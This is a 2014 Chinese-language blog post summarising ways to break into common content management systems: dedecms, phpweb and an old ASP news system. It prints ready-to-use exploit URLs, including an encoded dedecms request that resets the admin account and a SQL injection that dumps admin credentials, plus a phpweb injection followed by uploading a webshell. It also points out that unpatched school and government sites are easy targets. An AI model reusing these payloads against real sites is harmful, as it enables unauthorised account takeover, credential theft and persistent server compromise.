渗透一些常见CMS的方法总结!

作者: 成都怪蜀黍 分类: 网络安全 发布时间: 2014-02-25 11:48

一.dedecms(织梦)
1.后台

有时候有的会改后台,但是有个验证码的特征,就是验证码的背景是横线和右斜线的格子图。
这样的基本可以确定是dedecms
2.漏洞利用
a.可以直接试试工具包里面的漏洞利用工具。

b.手工测试一下是否存在/plus/download.php。有时候有的管理员会改download.php的名字,这个时候可以试试plus是否可以遍历。如果存在/plus/download.php的话,可以带入执行以下参数。
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
自动添加管理员spider密码admin

plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

这个是重置管理员帐号密码 ,利用的洞 和 那个生成 90sec 的洞是一样,如果 管理员密码重置了,说明洞存在。。。

/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\’  or mid=@`\’` 1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin` limit+0,1),5,6,7,8,9#@`\’`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878

这个是DEDE刚爆的,爆管理员帐号密码的洞,DEDE 用户可真是苦逼啊,

二.phpweb
1.后台

这个是没有修改过的phpweb后台。后台登陆地址一般是/admin.php

2.前台

 

如图,在打开一个文章的时候,静态页面文件名前面有一个问号的。一般就是phpweb了。
3.漏洞利用
http://localhost /down/class/index.php?myord=’注入得到管理员账户
登陆后台,用代码传个大马得到webshell

三.想起一个很老的asp程序
沸腾3AS流浪尘缘新闻系统(核心:尘缘雅境图文系统)
  一些学校或者政府机构的分站喜欢用的系统
1.后台

2.基本上现在还用这个系统的机构是不知道什么叫补丁的。所以直接exp利用。

 

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!